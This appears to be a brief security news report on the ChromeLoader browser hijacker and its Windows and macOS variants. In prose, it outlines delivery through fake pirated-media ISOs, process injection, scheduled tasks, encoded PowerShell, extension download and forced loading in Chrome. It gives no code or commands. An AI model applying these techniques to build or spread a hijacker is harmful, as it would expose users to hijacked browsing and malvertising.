A Google Chrome-based browser hijacker that was discovered earlier this year has seen a surge of activity in recent days, according to a recently released report. This browser hijacker’s ultimate purpose is to redirect user traffic to advertisement websites, but it uses interesting techniques during installation.
This browser hijacker, dubbed ChromeLoader, is initially delivered via an ISO file typically masquerading as a cracked video game or pirated movie. This ISO contains an executable file that, when executed, will inject itself into an svchost.exe process and create a scheduled task using the Task Scheduler API. This scheduled task is then executed, which runs a cmd.exe process that executes a Base64-encoded PowerShell command. This PowerShell command checks to see if the malicious browser extension is already installed and, if not, runs a wget.exe process to download and unpack the extension from a remote location. Upon successful unpacking, the scheduled task is silently removed and then a new Google Chrome process is executed using the “—load-extension” flag to load the downloaded extension. At this point, the extension performs its purpose of redirecting search results through malvertising domains.
A macOS variant of the ChromeLoader browser hijacker was also discovered that uses similar techniques to execute the malicious extension, using bash instead of PowerShell, making this a cross-platform threat. This variant is also capable of loading malicious extensions in both Chrome and Safari web browsers.